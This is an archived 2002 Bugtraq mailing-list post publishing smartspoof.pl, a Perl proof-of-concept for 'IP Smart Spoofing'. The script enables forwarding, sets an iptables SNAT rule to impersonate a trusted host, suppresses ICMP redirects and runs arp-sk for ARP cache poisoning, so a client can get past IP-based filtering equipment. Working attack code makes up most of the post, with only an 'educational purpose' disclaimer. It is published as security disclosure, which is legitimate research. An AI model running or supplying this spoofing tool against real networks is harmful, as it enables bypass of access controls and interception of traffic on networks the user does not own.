Exploit code for IP Smart Spoofing

From: Laurent Licour (llicour@althes.fr)
Date: 11/12/02

• Previous message: Aaron Howell: "[Fwd: Notice of serious vulnerabilities in ISC BIND 4 & 8]"
• Next in thread: Stephen Gill: "RE: Exploit code for IP Smart Spoofing"
• Reply: Stephen Gill: "RE: Exploit code for IP Smart Spoofing"
• Reply: Stephen Gill: "RE: Exploit code for IP Smart Spoofing"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: Laurent Licour <llicour@althes.fr>
To: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Date: Tue, 12 Nov 2002 13:21:17 +0100

Hello

As we reported in our previous article: IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced a
new method for IP Spoofing, allowing full-connexion from any client
software.

The exploit code smartspoof.pl is a proof of concept (for educational
purpose only) of the Smart Spoofing method

The additional software "arp-fillup" is necessary to achieve this:
http://www.althes.fr/ressources/tools/arp-fillup/arp-fillup-0.1.tgz

These tools are also available on
http://www.althes.fr/ressources/avis/smartspoofing.htm#tools

Exploit Code (perl source) :

#!/usr/bin/perl -w
#
# smartspoof.pl
#
# This script is provided as proof of concept for educational purpose only
#
# Laurent Licour 28/10/02
# llicour@althes.fr
# Althes (http://www.althes.fr)
#
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
#
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool (www.althes.fr/ressources/avis/smartspoofing.htm)
# Require iptables (www.iptables.org)

use strict;
use Getopt::Long;
use NetAddr::IP;

sub get_ip_next_hop
{
  my ($ip0, $int) = @_;
  my $ip=new NetAddr::IP $ip0;
 
  open(ROUTE, "route -n |");
  <ROUTE>; <ROUTE>;
  my $gateway="";
  my $masklen; my @fields; my $line; my $entry;
  while($line = <ROUTE>)
  {
    @fields = split / +/, $line;
    $entry=new NetAddr::IP($fields[0] . "/" . $fields[2]);
    if ($entry->contains($ip))
    {
      if (($gateway eq "") or ($masklen < $entry->masklen()))
      {
        $gateway = $fields[1];
        $masklen = $entry->masklen();
        $$int = $fields[7];
        chop $$int;
      }
    }
  }
  die "Error : No route for $ip \n" if ($gateway eq "");
  $gateway=$ip->addr() if ($gateway eq "0.0.0.0");

  return($gateway);
}

sub get_mac
{
  my $ip=shift;
  my $cmd="ping -c 1 -w 1 $ip >/dev/null 2>&1";
  system($cmd);
  $cmd="cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
  my $mac=`$cmd`;
  chop($mac);
  return($mac);
}

sub usage
{
  print "Start/Stop de smartspoofing\n\n";
  print "This is the proof of concept of the smartspoofing technique\n";
  print "(visit http://www.althes.fr/ressources/avis/smartspoofing.htm)\n";
  print "\n";
  print "You only have to specify :\n";
  print " -D : address of the filtering equipement to connect to\n";
  print " -S : address of the trusted host to spoof\n";
  print "\n";
  print "Then, you only need to launch your favorite client software from
this host\n";
  print "or any host behind this (because it is now a router)\n";
  print "\n";
  print "This script is provided as proof of concept for educational purpose
only.\n";
  print "\n";

  exit 0;
}

my $syntax = "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S <\@IP
source> -start|-stop\n";

my $ver = "smartspoof.pl v1.0 28/10/02\n";

my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface = "";
my ($version, $help);

Getopt::Long::GetOptions(
           "D=s" => \$ipdst,
           "S=s" => \$ipsrc,
           "i=s" => \$interface,
           "v" => \$version,
           "h" => \$help,
           "start" => \$start,
           "stop" => \$stop
          ) or die $syntax;

usage if $help;
die $ver if $version;
die $syntax unless @ARGV == 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;

my $cmd;

my ($intsrc, $intdst);
my $ipsrc_next_hop = get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop = get_ip_next_hop($ipdst, \$intdst);
$interface=$intdst if ($interface eq "");

if ($start)
{
  print "Activate IP Forwarding\n";
  system("echo 1 > /proc/sys/net/ipv4/ip_forward");

  print "Activate Arp fillup on $ipsrc\n";
  system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");

  print "Set NAT rule on iptables\n";
  $cmd="iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT --to
$ipsrc";
  system($cmd);

  print "Desactivate ICMP Redirect\n";
  system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j DROP");

  print "Activate Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop on $interface\n";
  $cmd="arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D
$ipdst_next_hop -c 1 >/dev/null 2>&1";
  system($cmd);
  $cmd="arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D
$ipdst_next_hop >/dev/null 2>&1 &";
  system($cmd);
}
elsif ($stop)
{
  print "Suppress Arp fillup on $ipsrc\n";
  system("killall arp-fillup");

  print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop\n";
  system("killall arp-sk");
  my $mac=get_mac($ipsrc_next_hop);
  $cmd="arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S
$ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";
  system($cmd);

  print "Clear iptables rules\n";
  system("service iptables stop");
  system("service iptables start");

  print "Desactivate ip forwarding\n";
  system("echo 0 > /proc/sys/net/ipv4/ip_forward");
}

Regards

Laurent Licour
mailto:llicour@althes.fr
Althes
http://www.althes.fr

 

*---------------------------------------------------------------*
* Cet e-mail et toutes les pièces jointes sont destinés aux *
* seules personnes auxquelles ils sont spécifiquement adressés *
* et n'engagent que le signataire de ces documents et non la *
* structure dont il dépend. *
* Leur existence et leur contenu ont un caractère confidentiel. *
* Toute utilisation ou diffusion non autorisée est interdite. *
* Si vous avez reçu cet e-mail ou si vous détenez sans en être *
* le destinataire, nous vous demandons de bien vouloir nous en *
* informer immédiatement. *
* Cette note assure que ce message a été contrôlé et ne *
* comprenait aucun virus connu à ce jour, néanmoins tout *
* message électronique est susceptible d'altération. *
* Nous déclinons toute responsabilité au titre de ce message *
* s'il a été altéré, déformé ou falsifié. *
*---------------------------------------------------------------*
 

---

• Previous message: Aaron Howell: "[Fwd: Notice of serious vulnerabilities in ISC BIND 4 & 8]"
• Next in thread: Stephen Gill: "RE: Exploit code for IP Smart Spoofing"
• Reply: Stephen Gill: "RE: Exploit code for IP Smart Spoofing"
• Reply: Stephen Gill: "RE: Exploit code for IP Smart Spoofing"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(14)